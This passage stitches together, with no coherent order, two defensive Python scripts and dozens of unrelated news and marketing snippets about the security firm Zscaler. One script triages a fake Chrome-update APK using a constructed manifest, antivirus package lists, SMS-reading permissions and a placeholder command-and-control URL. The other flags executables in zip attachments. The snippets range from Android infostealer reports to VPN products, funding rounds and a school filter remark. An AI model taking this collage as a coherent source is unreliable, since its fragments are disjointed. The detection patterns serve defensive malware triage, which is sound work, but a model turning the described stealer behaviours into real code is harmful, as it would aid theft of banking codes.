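LEGIT_CHROME_PACKAGE = "com.android.chrome"

# Package identifiers this example assumes for the AV vendors named above.
AV_PACKAGES = {
    "com.kms.free": "Kaspersky",
    "com.eset.ems2.gp": "ESET",
    "com.avast.android.mobilesecurity": "Avast",
    "com.drweb": "Dr.Web",
}

# Permissions that let an app read the channels banks use for one-time codes.
OTP_PERMISSIONS = {
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_CALL_LOG",
}

# Constructed manifest standing in for one decoded from a fake
# "Update_chrome.apk"; package and class names are made up.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.update.chrome">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <application android:label="Chrome">
        <receiver android:name=".AdminReceiver"
                  android:permission="android.permission.BIND_DEVICE_ADMIN">
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

# Constructed strings as they might be pulled from the decoded APK's code.
SAMPLE_STRINGS = [
    "http://example.invalid/gate.php",
    "com.kms.free",
    "com.eset.ems2.gp",
    "content://sms/inbox",
]


def attr(name: str) -> str:
    """Qualify an attribute name with the android: namespace."""
    return "{%s}%s" % (ANDROID_NS, name)


def parse_manifest(xml_text: str) -> Dict[str, object]:
    """Pull out the package, label, permission set and device-admin receiver."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    perms = {e.get(attr("name")) for e in root.iter("uses-permission")}
    device_admin = any(
        r.get(attr("permission")) == "android.permission.BIND_DEVICE_ADMIN"
        or any(a.get(attr("name")) == "android.app.action.DEVICE_ADMIN_ENABLED"
               for a in r.iter("action"))
        for r in root.iter("receiver")
    )
    return {
        "package": root.get("package"),
        "label": app.get(attr("label")) if app is not None else None,
        "permissions": perms,
        "device_admin": device_admin,
    }


def find_av_references(strings: List[str]) -> List[Tuple[str, str]]:
    """Hard-coded AV package names show the app means to look for security apps."""
    return [(s, AV_PACKAGES[s]) for s in strings if s in AV_PACKAGES]


def triage(xml_text: str, strings: List[str]) -> Dict[str, object]:
    info = parse_manifest(xml_text)
    reasons = []
    label = (info["label"] or "").lower()
    if "chrome" in label and info["package"] != LEGIT_CHROME_PACKAGE:
        reasons.append("impersonation: labelled Chrome but package is %s" % info["package"])
    if info["device_admin"]:
        reasons.append("device admin receiver: cannot be uninstalled until admin is revoked")
    otp = sorted(info["permissions"] & OTP_PERMISSIONS)
    if otp:
        reasons.append("can read SMS/call data used for one-time codes: %s" % ", ".join(otp))
    av = find_av_references(strings)
    if av:
        reasons.append("references AV packages: %s" % ", ".join(v for _, v in av))
    verdict = "malicious" if len(reasons) >= 3 else ("suspicious" if reasons else "clean")
    return {"verdict": verdict, "reasons": reasons, **info}
```

Real manifests usually carry the label as a resource reference (`@string/app_name`), so on an undecoded APK the label check needs the resolved string; the device-admin and permission checks work on either form.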
Zscaler notes that the malware is powerful enough to compromise the privacy of Android device users and leak critical information such as credit card details, which can, in turn, lead to financial banking fraud.
Security researchers discovered malware targeting Android devices that disguises itself as a Google Chrome update package in an attempt to fool users and lower their defenses.
Zscaler researcher Viral Gandhi said in a blog post that the malware's author uses domain squatting on several URLs that mimic those of a Google Android update in order to trick users and spread the Infostealer. He added that the fake URLs are very short-lived, being regularly replaced with newer ones to serve the malware and effectively evade URL-based filtering.
Zscaler has been working on the Private Access technology for nearly three years, according to Patrick Foxhoven, CIO and vice president of Emerging Technologies at Zscaler. He added that Private Access is functionally different from a traditional Internet Protocol Security (IPsec) or Secure Sockets Layer VPN (SSL-VPN). "The VPN space hasn't been disrupted in a meaningful way in over a decade," Foxhoven told eWEEK. "We wanted to bring a disruptive cloud-scale approach to the challenge of remote access.”
According to Zscaler’s Director of Security Research Deepen Desai, Update_chrome.apk is spreading via “compromised or malicious websites using scareware tactics or social engineering.” Desai told ZDNet that the firm has seen Android malware use “scareware tactics where the user will see a popup indicating that their device is infected with a virus and asks them to update to clean up infection."
The research team at technology company Zscaler has unearthed new Android Infostealer malware which is capable of harvesting call logs, SMS data, browser history and banking information and sending them to a remote command and control server. What’s more, the firm says the malware, which disguises itself as a Google Chrome update, also has the ability to go unseen by checking for well-known installed anti-virus applications such as Kaspersky, ESET and Avast and terminating them.
Criminals continue devoting attention to mobile malware. Zscaler finds information stealing Android malware circulating in the wild posing as a Chrome update.
BT has directly connected Zscaler access points to the company’s global network so that BT customers can benefit from lower latency and better performing applications. The improved interconnectivity reduces the need to move traffic over great distances to access Zscaler nodes for secure internet access.
Director of Security Research at Zscaler, Deepen Desai, told ZDNet, “The malware may arrive from compromised or malicious websites using scareware tactics or social engineering.” An easy way to avoid that trouble is to stay away from questionable websites in the first place, and think twice about clicking “Ok.” He said, “One common theme we have seen in recent malicious android application packages involves scareware tactics where the user will see a popup indicating that their device is infected with a virus and asks them to update to clean up infection.”
Syndicated in Yahoo Tech
It's been hiding, say researchers at Zscaler, on multiple domains similar to Google update paths. Each URL stays online only for a short time, to be replaced by a new one regularly to avoid detection.
Zscaler is warning Android users about a fake Google Chrome update that installs malware onto their devices. The malware steals information including browser data, banking details, call logs and SMS data which is then sent to a remote server.
The remote connection from a user to an application is said to be governed by granular policies which, thanks to the cloud-based approach, are easy to set up and manage through a central administration interface. Zscaler Private Access therefore does without hardware such as VPN concentrators or load balancers and accordingly involves little administration and implementation effort.
“The service is also designed to replace the need for stacks of security gear at individual data centers, to protect traffic going between data centers, as often exists today. ‘If enterprises are looking at moving some of their applications out to an AWS or Google Compute or Azure, they have to extend their network out to those public clouds in order to provide connectivity,’ Wessels says. ‘They want to embrace the agility of the cloud and put their private applications there. But they are having to use old legacy network plumbing tools to be able to extend that connectivity.’”
The vendor is thereby extending its cloud-based security services. Instead of connecting devices to the network, as a VPN does, Zscaler Private Access connects people to applications. This is meant to reduce complexity and increase security.
Zscaler, an Internet security specialist, announces a new service under the name Zscaler Private Access, through which companies can authorise access to their internal applications and services without compromising the security of their network.
“The VPN hasn’t changed in 20 years,” says Zscaler’s engineering sales director Mark Ryan as he sets out the case for something called Private Access, his firm’s reinvention of the VPN in a form it believes is more suitable for a world of remote access to cloud applications.
Denzil Wessels, senior director of product management for emerging technologies at Zscaler, said that one of the big use cases was third parties and independent contractors who need access to apps. With a traditional VPN, their access was only as good as the rules that were defined for them. But ZPA offers per-application access by user, which means they'll only be able to access the apps they need.
“An additional benefit of ZPA is that it allows companies to transition off of an existing VPN infrastructure without breaking access. Applications can be moved one at a time into the Zscaler Private Access platform without modifying the existing network. As each application is removed, a smaller, simpler VPN is left behind.”
Zscaler presents the cloud service "Zscaler Private Access". It enables companies to grant employees and suppliers granular, targeted access to individual applications and services without endangering the security of corporate data. It makes no difference whether the applications run on-premises or in the cloud.
Intended as an alternative to traditional VPNs that are difficult to set up and maintain, Zscaler Private Access routes traffic via secure tunnels through a global network of data centers based on which of those data centers will provide the lowest network latency, says Denzil Wessels, senior director of product management for emerging technologies at Zscaler. As part of that process, a Zscaler policy engine ensures that the traffic moving through those tunnels is limited to the applications that any given user has permission to access.
‘Zscaler Private Access extends Zscaler’s security capabilities across the entire spectrum of enterprise traffic, including all web traffic and all private application access, for all ports and protocols,’ said Jay Chaudhry, CEO of Zscaler. ‘We’ve used our cloud security infrastructure to significantly advance the state-of-the-art in security and access to a company’s private applications.’
Zscaler Private Access takes a new approach by decoupling applications from the physical network to deliver granular, per-user access to apps and services running on the internal corporate network, in a data center or in a public cloud. The service is based on Zscaler's existing global cloud, so there is no requirement for additional hardware or forklift upgrades of existing hardware. Customers are already using this technology in the wild, and they seem pretty happy: MAN Diesel & Turbo "is always looking for the state of the art in security technology and have been searching for an alternative to our global VPN solution," said Tony Fergusson, IT Infrastructure Architect for MAN Diesel & Turbo. "In general, legacy VPN technology is extremely complex, doesn't scale well and, most importantly, lacks application-centric security. Traditional VPNs extend the network perimeter to any user that connects, which is a security risk. Zscaler Private Access allows me to give users access to a single application and not to my entire network. This granular application control is also perfect for the growing demand of contractors and partner access."
Cloud security provider Zscaler today announced the introduction of Zscaler Private Access, a new service that enables organizations to provide access to internal applications and services while ensuring the security of their networks.
But several other cyber security companies have put their IPOs on hold for months already. They include Bit 9 + Carbon Black, Veracode and Zscaler, according to venture capitalists.
We use a program called Zscaler as our filtering system. It will work at home as well as it does at school, but it is not 100 percent. It only catches what someone has identified as a problem, so we try to teach our students and teachers safe searching.
Businesses need to employ sandboxing technology and dynamic data analysis in order to counter-act aggressive corporate ransomware attempts. In the coming months, we will continue to see ransomware become increasingly corporate focused, and as it does, enterprises won’t get away with paying consumer prices. Hackers will narrow their attacks to target enterprise servers and in doing so, will demand much, much more. The criminals behind ransomware campaigns are savvy and now that they’re realising that they can lock up enterprise source code and important financial documents, they know they’re in for a big payday.
Wanting to allow mobile workers to work remotely, another commercial company, Zscaler, noting the move to cloud services in Web 2.0, decided to introduce a cloud-based security service; company CISO Michael Sutton explained that although “SSL by default is great for privacy, it is terrible for the enterprise.”
We’ve added four contributing members since then. The contributing members are Reversing Labs, Barracuda, Zscaler and Eleven Paths. We sort of put a cap on it last year while we got our act together. We had to learn how to trust each other and we had to build some infrastructure to allow efficient sharing.
Skyhigh has already established partnerships with Bay Dynamics, Bitsight, Centrify, Checkpoint, Cisco, Cyphort, Exabeam, Gemalto, HPE, IBM, Ionique, Juniper Networks, Logrhythm, Microsoft, Mobileiron, Okta, Onelogin, Ping Identity, Titus, Vera, VMware and Zscaler.
"Besides being able to quickly pivot their network infrastructure and delivery techniques, and being able to generate randomized payloads to avoid signature-based blocks, they also use tactics like code-signing certificates to give their installers an extra air of legitimacy," Desai said. "We were able to identify them with the Zscaler Behavioral Analysis Engine, which allowed us to evaluate the threats on the basis of what they will actually do on a user's machine versus how they're coded."
In September, Google invested in Zscaler, an Internet security company, in a $25 million continuation of its Series D round. In total in that round Zscaler raised $110 million.
Zscaler, San Jose, Calif., Cloud Security Platform
The tech hub's venture capitalists were investing so much money in startups worth at least a billion dollars that a baby one-horned horse was born every four days. They often had cute, if difficult to interpret, names, like Twilio, Sprinklr and Zscaler.
Locky is one of the most active and lucrative malware variants to have circulated over the past three years. The ransomware follows the well-known model of asymmetric encryption to lock the user's documents and extort a ransom for decryption. An overlap was also observed between the URLs used to deliver the Locky and Dridex payloads.
Training starts with feeding it firewall and proxy system logs from vendors like Blue Coat, Cisco, Zscaler, Palo Alto, Juniper Networks and others
These currently include devices from Blue, Cisco, Zscaler, Fortigate, Palo Alto, McAfee, Check Point, Squid, Juniper, Sophos, Websense, and Microsoft.
Zscaler’s route to market has been through large service providers. It has relationships with companies such as Verizon, BT, Orange Business Services, AT&T, along with many other regional service provider relationships and value-added, nimble resellers who are delivering mobility and digital solutions to the enterprise market, [Scott Robertson] said. In Australia, it has relationships with companies like Telstra, Optus and The Missing Link.
Details regarding the actual attack and which government systems were infected are scant. Government officials said they knew the initial attack occurred in 2011, but are unaware of who specifically is behind the attacks. "Given the nature of the malware payload involved and the duration of this compromise being unnoticed, the scope of lateral movement inside the compromised network is very high, possibly exposing all the critical systems," Desai said.
According to Microsoft Technet's official site, this service can support firewalls and proxies like Blue Coat, Cisco, Fortigate, Zscaler, Palo Alto, Check Point, McAfee Secure Web Gateway, and many more.
Supported devices include firewalls and proxies from most major vendors, among them Blue Coat, Cisco, Zscaler, Fortigate, Palo Alto, Check Point, Websense, Juniper, and Microsoft’s own Forefront Threat Management Gateway.
Zscaler | Software | 1 | 0.138 | July 2015 | United States
Making that jump, however, drove Somerville/ISNet to reconsider how its SECaaS services – which bundle commercial antivirus, intrusion prevention, VPN and other security tools from the likes of Cisco Systems, McAfee, IronPort Systems, Zscaler, and Check Point Security Systems – could keep up with surging demand.
Zscaler warned that the Locky ransomware family is still going strong and that it has blocked 75 unique and new payloads that were targeting its customers. They warned that the ransomware authors have migrated from infecting Microsoft Word documents to delivering the malicious content through zip attachments in spam emails.
On the list of 174 unicorns compiled by Fortune, SMB software companies are few in number: Stripe, Zenefits, DocuSign, CloudFlare, Zscaler and Powa are among them.
Elsewhere in the security world, Zscaler has discovered new instances of the Locky ransomware that was used to target the Hollywood Hospital last month.
In both attacks, cyber criminals used the same ransomware known as Locky, which arrives via email attachments and encrypts all the data on an infected system and deletes the originals. Security firm Zscaler says it has blocked around 75 unique and new payloads from this ransomware family in the past month alone.
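The move from macro documents to zip attachments, noted above, shifts the first line of defence to whatever opens the archive at the mail gateway. The following script is an added example, not Zscaler's code and not derived from a Locky sample (the reports above do not say what the zips contain): it walks a zip attachment, recurses into nested archives to a fixed depth, and flags script or executable members and the "decoy.pdf.exe" double-extension trick. The attachment it inspects is built in memory from placeholder content for the example.

```python
import io
import zipfile
from pathlib import PurePosixPath
from typing import Dict, List, Tuple

# Extensions a mail gateway would not expect inside a legitimate document zip.
RISKY_EXT = {".exe", ".scr", ".com", ".pif", ".js", ".jse", ".vbs", ".vbe",
             ".wsf", ".hta", ".bat", ".cmd", ".ps1", ".lnk", ".jar"}
# Extensions used as the decoy half of a double extension ("scan.pdf.exe").
DECOY_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
ARCHIVE_EXT = {".zip"}
MAX_DEPTH = 2                        # nested archives beyond this are not opened
MAX_MEMBER_SIZE = 50 * 1024 * 1024   # declared size above this is flagged, not read


def build_zip(members: Dict[str, bytes]) -> bytes:
    """Build an in-memory zip from {name: content}; used only to construct input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, content in members.items():
            z.writestr(name, content)
    return buf.getvalue()


def build_sample_attachment() -> bytes:
    """Constructed attachment: a script dropper, a harmless decoy, and a nested
    zip hiding a double-extension executable. All contents are placeholders."""
    inner = build_zip({"scan_0423.pdf.exe": b"MZ placeholder, not a real PE"})
    return build_zip({
        "invoice_J-98.js": b"var sh = new ActiveXObject('WScript.Shell');",
        "readme.txt": b"Please find your invoice attached.",
        "archive.zip": inner,
    })


def inspect_attachment(data: bytes, depth: int = 0, prefix: str = "") -> List[Tuple[str, str]]:
    """Return (finding, member_path) pairs for everything that should not be in
    a document attachment, recursing into nested zips up to MAX_DEPTH."""
    findings: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            suffixes = PurePosixPath(info.filename.lower()).suffixes
            ext = suffixes[-1] if suffixes else ""
            if info.file_size > MAX_MEMBER_SIZE:
                # Declared uncompressed size; never inflate something this large.
                findings.append(("oversized_member", path))
                continue
            if ext in ARCHIVE_EXT:
                if depth >= MAX_DEPTH:
                    findings.append(("archive_nested_too_deep", path))
                else:
                    findings.extend(inspect_attachment(z.read(info), depth + 1, path + "/"))
            elif ext in RISKY_EXT:
                decoy = len(suffixes) >= 2 and suffixes[-2] in DECOY_EXT
                findings.append(("double_extension" if decoy else "executable_content", path))
    return findings


def should_block(findings: List[Tuple[str, str]]) -> bool:
    """Policy: block on any active content, and also on anything that could not
    be inspected (too deep or too large), since unknown is not safe."""
    return bool(findings)


if __name__ == "__main__":
    for kind, path in inspect_attachment(build_sample_attachment()):
        print(f"{kind:24s} {path}")
```

Extension checks are a floor, not a ceiling: a gateway that can afford it should also sniff member content (an `MZ` header under a `.txt` name, for instance), and password-protected zips, which cannot be inspected at all, deserve the same default-deny treatment as the too-deep case here.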
Zscaler delivers a safe and productive Internet experience for every user, from any device and from any location – 100% in the cloud. With its multi-tenant, distributed cloud security platform, Zscaler effectively moves security into the Internet backbone, operating in more than 100 data centers around the world.
Zscaler head of security research Deepen Desai said that now that BinDiff is free, it will help application security and malware coverage. "The graphical view provided by BinDiff makes it easier to spot the similarities as well as differences in the disassembled code. This tool can be used for identifying new vulnerabilities as well as verifying vulnerability fixes by comparing the vendor patches with the original file," Desai said.
TPG Growth, the middle market growth equity platform of TPG, has partnered with companies such as Airbnb, Domo, Uber and Zscaler and recently led the incubation and launch of STX Entertainment.
Zscaler, founded in 2007 by Jay Chaudhry, is currently valued at $1 billion. The startup provides automated threat forensics and dynamic malware protection against advanced cyber threats, such as advanced persistent threats and spear phishing, for more than 6,000 corporate, government and military organizations and more than 15 million paying users.
Internet Protect Pro is a cloud-based firewall based on software from Zscaler. For its German customers, Deutsche Telekom will run it in its own data centers in Biere, Germany, ensuring that their data doesn't leave the country.
Zscaler has uncovered new instances of the Android Marcher Trojan disguised as a Flash Player for watching pornography on Android devices. By prompting users to update their Flash Player through the Google Play Store and deceiving them into filling in their payment details, the operators are exploiting goodness knows how many hapless porn-watchers.
The new Telekom Security unit, which is to start officially as its own business division on 1 January 2017, will, according to the company, bundle the security areas of various group units. The goal: to increase the Bonn-based group's clout in the cybersecurity market. It is also breaking new ground in the process, for example with the "Internet Protect Pro" security solution in cooperation with the American vendor Zscaler.
Zscaler is quickly becoming one of the most popular cloud security vendors around. The company's Zscaler platform uses a SaaS model to protect organizations from threats coming to or from the Internet, as well as public and hybrid clouds.
Researchers said they captured over 50 unique payloads from this campaign serving a fake adobe flash player for watching porn. The goal of the malware is to steal the user's financial information from a phishing page designed to mimic the Google Play store payment page that supposedly needs to be filled out before a victim can access the “content,” researchers said.
Security firm Zscaler is warning about a new variant of the Android Marcher Trojan that is using Adobe Flash and adult content sites as a way to trick users into becoming infected and giving up financial information. Many different vulnerabilities show up in Adobe Flash—in fact, Adobe just released fixes to address 23 of the latest security flaws this week.
Any action that leads to the opening of Google Play store app will trigger the fake payment screen to appear, it said. “This is a new tactic for Marcher where the malware authors are pushing a redirect link to the official Google Play store and the X-Video app,” Zscaler told Threatpost. Researchers theorize the redirect is likely to force the Google Play store app to launch.
Rather, the Android Marcher Trojan uses a fake version of an Adobe Flash Player installer to infect users. "The majority of the Marcher Trojan downloads that we are blocking in the cloud are from porn sites," Deepen Desai, head of security research at Zscaler, told eWEEK. "This appears to be a popular social engineering tactic where the user is prompted to install the Flash Player update to view the porn video, and the attack cycle can start with an email or SMS."
The tricky balance between back doors and encryption: Zscaler's Jay Chaudhry
At the 2016 RSA Conference, CSO's Steve Ragan chats with Zscaler CEO Jay Chaudhry about the Apple/FBI case, and whether there's a way to have encryption backdoors without letting everyone in.
The researchers warned that ransomware has now migrated from holding Windows PCs users to ransom onto the Android OS, with several varieties attacking the open source platform in 2015. Last September for example, Zscaler discovered a nasty piece of Android ransomware in the form of the Adult Player app. This app was not available to download from the Android app store but had to be accessed from other sites, and appeared to offer pornographic videos.
Zscaler is the only true integrated cloud security platform. It delivers carrier-grade internet security, advanced persistent threat (APT) protection, data loss prevention, SSL decryption, traffic shaping, policy management and threat intelligence – all without the need for on-premise hardware, appliances or software. Zscaler’s cloud-based Next Generation Firewall fills the security whitespace, allowing for better visibility, control and protection for the entire extended enterprise, with a total cost of ownership up to 90 percent lower than hardware-based protections.
Larry Biagini, General Electric's former chief tech officer, has ditched retirement to become chief tech evangelist at the Internet traffic-scrubbing startup Zscaler.
“It made sense for us to have someone who can evangelize the message,” says Jay Chaudhry, Zscaler’s founder, chief exec, and chairman, on a call with Fortune. “Quite often a (chief information officer) will say, I like what you’re saying but I’m nervous about moving to the cloud. It’s a major change and the whole business depends on it.” Chaudhry says he met Biagini four years ago while courting GE and that the two got along well. Now Biagini has been enlisted to help steer Zscaler’s marketing and product strategy, Chaudhry says.
Mobily has introduced information security services in the Kingdom, based upon the “highest international standards.” The company has developed valuable international partnerships to facilitate provision of optimal services. This includes partnerships with organizations such as Zscaler, Arbor and IBM, among others.
"What Zscaler does is see who is coming in and going out. If your PC is calling a host in Korea, you cut it off and inform the IT department," Jay says. "In the competitive world of IT security - there is a shouting match, we cover more threats, we're up to speed. It is a race to the bad guys but being in the cloud is very beneficial. We're set apart. Security boxes inspect traffic but they don't inspect everything because it uses more cycles. They say look at the header, they may look at source, they may look at behaviour. But we put our R&D into inspecting every byte that goes in and out. Tracking a phone call is easy but inspecting the content of the conversation is hard. That's what we do. We inspect the content. So my software does it better than any box."
MarketsandMarkets says SECaaS will grow from $3.1 billion in 2015 to more than $8.5 billion in 2020. That’s a compound annual growth rate of 22 percent. This is largely due to the increasing bring-your-own device (BYOD) trend among businesses worldwide... MarketsandMarkets names Symantec, McAfee, Cisco, Trend Micro, CipherCloud, Zscaler, Alert Logic, Radware and others as “major vendors.”
Research by Zscaler shows the phony application contains a Trojan that steals SMS messages. The malware describes itself as a 'security control' and thereby tricks victims into believing it is an application that makes AliPay more secure. AliPay is described as the East's PayPal, with zero transaction fees. Worldwide, over 300 merchants accept AliPay. The online payment service supports transactions in fourteen major foreign currencies.
Jay Chaudhry, CEO said: "Is being public a destination? No it is a step in the journey. Many companies go public because they need funds to scale. Many go public because VCs have put in money and they want a return and they need to get their money out. ZScaler doesn't have any of those pressures. Public helps the brand, large firms feel more comfortable doing business with public companies because all the numbers are out there. The employees are shareholders and have easy liquidity. But it is a step."
Security experts at Zscaler have warned Android users about a new threat. The malware masquerades as a security feature of the popular online payment app AliPay but is in fact a Trojan that intercepts SMS messages. Users download the malware fully convinced that they are installing an app that strengthens AliPay's protection. Three seconds after the Trojan is installed its icon is removed, but the program itself does not go anywhere. Unnoticed by the victim, the malware registers Android services capable of running in the background and performing long-running tasks.
At a time when Safe Harbor is being called into question, note that Skyhigh has three data centers located in the United States, Asia and Europe (Frankfurt). Equinix is the platform the start-up has chosen in order to work as close as possible to its customers. A partnership has also been formed with Zscaler to provide a proxy log analysis solution to the security specialist, which works notably with LVMH and several French banks.
According to Julien Sobrier, "one of the big problems is having an overall view of all connected devices and of where they sit in the network." Indeed, companies are not yet aware of the multitude of devices that can connect to the network, such as the photocopier, smart TVs, air-conditioning systems and other building-automation elements, or access badges. Julien Sobrier has observed "in studies that in a bank, for example, the network for the air conditioning was on the same network as the devices handling credit cards."
Zscaler researchers discovered an Android malware masquerading as a security feature for AliPay, a Chinese online payment app similar to PayPal with a large customer base and used by 65 financial institutions, including Visa and MasterCard. “The fake app is a malicious SMS stealer Trojan” that appears as "Security Controls" to hoodwink victims, they wrote in a blog post.
According to Zscaler research, the fake app is a malicious SMS stealer Trojan. It portrays itself as "security controls," tricking victims into thinking it’s an app enhancing AliPay. AliPay, the PayPal of the East, is a third-party online payment platform with no transaction fees, supporting more than 65 financial institutions including Visa as well as MasterCard. Globally, more than 300 merchants use AliPay. It also supports transactions in 14 major foreign currencies.
During an ongoing analysis to protect our customers from the latest mobile threats, we came across an Android malware that disguised itself as a security feature for a famous Chinese online payment app, AliPay.
Standalone SMS-stealing trojans are strange because there's not that much they can do. Zscaler suspects that this trojan may be part of a larger cybercrime campaign, alongside other Android hacking tools. SMS stealers are often used together with other malware families, allowing attackers to intercept two-factor authentication codes and payment verification codes for online banking operations.
According to Zscaler, the changing IT landscape, brought on by the shift of applications from the data centre to the cloud and the increased access through mobile devices, introduces new threats that go undetected by appliances deployed in the data centre. As a result, enterprises have to rethink their traditional appliance-centric castle-and-moat security architectures while continuing to provide their users with access to cloud applications and services. To combat this, Zscaler’s cloud security platform provides inline threat protection to guard against cyber attacks, prevent data leakage and allow safe enablement of cloud applications by employees, the company says.
In November 2015, the Cyber Threat Alliance (CTA), an organisation counting Symantec, Fortinet, Zscaler, Intel Security and Palo Alto among its members, put the total damage done by CryptoWall 3.0 at a headache-inducing $325 million. Astonishingly, the world barely blinked at the scale of this estimate.
Zscaler's cloud security platform provides full inline threat protection to guard against cyber attacks, prevent data leakage and enable the safe usage of cloud applications. CloudLock delivers crowdsourced-based application risk scores (CloudLock Community Trust ratings) for more than 101,000 applications, six times as many as any other CASB vendor.
There's probably no more embarrassing way to get a phone bricked by ransomware than through an inability to curb certain, ahem, urges while on the go. But that is exactly what's happening, according to researchers at Zscaler who have found that certain porn apps on Android are actually no more than a masquerade for ransomware. Even worse, some of them are automatically taking unauthorized selfies of users and using those in ransom letters to make sure they pay up.
SD-WAN also could serve as a simple interface to Zscaler or other cloud-based security services, allowing for local internet breakouts without requiring further investment in on-premise security appliances.
Attackers have recently revived their interest in Microsoft Office macros, which are being actively used to distribute banking Trojans and, more recently, the BlackEnergy malware. According to researchers at the American company Zscaler, the technique is being used by the operators of the Kasidet Trojan, also known as Neutrino. The malicious Office macros are distributed as attachments to phishing emails. According to Zscaler's observations, activity in this malicious spam campaign has increased significantly over the past two weeks. Besides Kasidet, the same VBA dropper also downloads the Dridex banking Trojan.
Researchers at Zscaler spotted attackers using macro malware as a vector to spread the Neutrino bot, also known as Kasidet, via spearphishing emails. Over the past two weeks, attackers have been using the same visual basic for applications (VBA) macros found in Microsoft Office that have been leveraged to place Dridex to drop Neutrino as well, according to a Jan. 29 security post.
Today, vendors are emerging with solutions to deliver guaranteed application performance to the modern users and workloads of the hybrid enterprise, by applying SDN principles to the WAN in the form of so-called SD-WAN solutions. These solutions offer a simple interface to Zscaler or other cloud-based security services, enabling local Internet breakouts without requiring further investment in on-premises Internet security appliances.
A Chinese government website got hit by a ransomware malady. Initially exposed by Zscaler IT security company in November 2015, this virus campaign put all visitors of cxda.gov.cn web page at risk. Whenever a person visited the compromised website, a malicious script would reroute their traffic to a third-party page hosting the Angler exploit kit. The exploit kit was leveraged to contaminate the users with CryptoWall 3.0 ransom Trojan. Luckily, the infection was shortly removed from the site. This case is unique because it was the first time ransomware distributors took advantage of a government website to infect unsuspecting end users.
Zscaler looks to bring the best of cloud computing to the Internet security market. With a per-user subscription model based fully in the cloud, Zscaler acts as a "check post" between an enterprise and the Internet, scanning traffic using its solutions for Internet security, advanced persistent threat protection, data loss prevention, SSL decryption, traffic shaping, policy management and threat intelligence.
"Malicious Office document file is a popular vector for malware authors to deliver their payloads. Dridex authors have leveraged this technique for over a year and it was interesting to see the same campaign and URLs being leveraged to deliver Kasidet payloads," the researchers wrote.
The Neutrino bot is getting a new boost of rejuvenation from a retro form of distribution that's been making a huge comeback lately. According to research last week out from Zscaler, Neutrino--also known as Kasidet--has spiked again in the wild with the help of malicious Microsoft Office macros. This latest example of VBA-related malware is another piece of evidence that a once forgotten class of malware has roared back to life in the last 18 months. The delivery of Kasidet backdoors is the continuation of a months-long series of campaigns to drop the Dridex banking malware on victim computers using malicious macros, Zscaler researchers say.
“Malicious Office documents are a popular vector for malware authors to deliver their payloads,” said Zscaler researchers, in the analysis. “Dridex authors have leveraged this technique for over a year and it was interesting to see the same campaign and URLs being leveraged to deliver Kasidet payloads. While this does not establish any links between the two malware family authors, it reaffirms the fact that a lot of the underlying infrastructure and delivery mechanisms are often shared by these cyber criminals.”
There are two techniques used by the malware to steal data. The first is memory scraping to take data from PoS systems, done by checking memory regions used by a number of system functions. The second approach is to hook the browser, and this is where Kasidet is having good success on users' machines. Internet Explorer (all versions), Firefox and Chrome are all susceptible, but Zscaler has not said whether Microsoft Edge, its latest browser, is also affected.
What makes this announcement interesting is that it comes hot on the heels of yet another malware, in this case Kasidet, being exposed by Zscaler and being distributed by macros. The risk is that by claiming white lists are the magic bullet Glasswall, and Sim in particular, are at risk of oversimplifying the security message.
It’s well documented that attackers have reignited their love affair with the Office macro, using it as a vector for spreading banking malware and even the BlackEnergy Trojan as of late. According to researchers at the San Jose security company Zscaler, the bot Kasidet, also known as Neutrino, has also adopted this technique. Attackers peddling the bot have stepped it up over the past two weeks, according to a trio of researchers, Abhay Yadav, Avinash Kumar and Nirmal Singh, with the company.
Symantec is on trend. The malware company has extended its DLP to email and storage services. Cloud access security brokers such as Zscaler and Netskope have DLP capabilities (Symantec's former CEO, Enrique Salem, is a Netskope board member).
As companies embrace local Internet breakouts, they must also strengthen their security environments in the branches themselves. To do so, enterprises typically implement secure Web gateways (SWGs) that analyze specific ports such as HTTP/HTTPS and often use SWGs in combination with advanced threat detection (ATD) to detect the more advanced attacks. Now these capabilities are becoming available as a cloud service. Interfacing with a security-service provider such as Zscaler enables local Internet breakouts without requiring further investment in on-premises Internet security appliances.
The investment marks Google Capital’s fourth cybersecurity investment. Earlier ones included in CrowdStrike, Zscaler, and CloudFlare.
VMware, Zscaler, Websense and more all joined in to deliver new features and areas of operations to VeloCloud and further drive that impressive new year.
Early in the year, VeloCloud added complementary cloud security from Zscaler and Websense (now Forcepoint).
Zscaler made a list of the 20 riskiest applications, in terms of actual (attempted) user victimisation and based on data from one of Zscaler’s cloud-based data sets over a period of 180 days from the beginning of 2015. Facebook, Skype and Twitter top the list of sites containing the most malware. Often, users click on or unwittingly download malicious applications without realising they have put themselves and the organisation in danger.
Regionalized services can be deployed in private regional network hubs, owned and operated by the enterprise. For companies that would rather outsource this altogether we are seeing the emergence of security-as-a-service offerings such as Zscaler (which has of order 100 regional hubs), or Unified Communications-as-a-Service (UCaaS) offerings from the likes of Orange Business Services, 8X8, HP and others.
"Providing security as applications migrate to the cloud is increasingly important," said the financial analyst who asked not to be named. "Zscaler is key to providing cloud-based security today. Many of Cisco's competitors partner with Zscaler, which is an added bonus."
Commenting on the investment, Cisco vice president and general manager of the enterprise infrastructure and solutions group said the company "is committed to open networking, and interoperability with the VeloCloud solution will provide our joint customers with additional enhancements for application and cloud services performance." In addition to Cisco, VeloCloud’s vendor partners include BroadSoft, Equinix, Hewlett Packard Enterprise, IIx Console, Intel, VMware, Websense and Zscaler.
ForeScout’s latest round of financing vaults the company into the coveted “unicorn” club, a burgeoning pack of venture capital-backed companies with billion-dollar valuations. As part of the late-stage injection, investors have appraised the firm at $1 billion; other “unicorns” in the cybersecurity category include Tanium, Okta, Illumio, Avast, Lookout, and Zscaler.
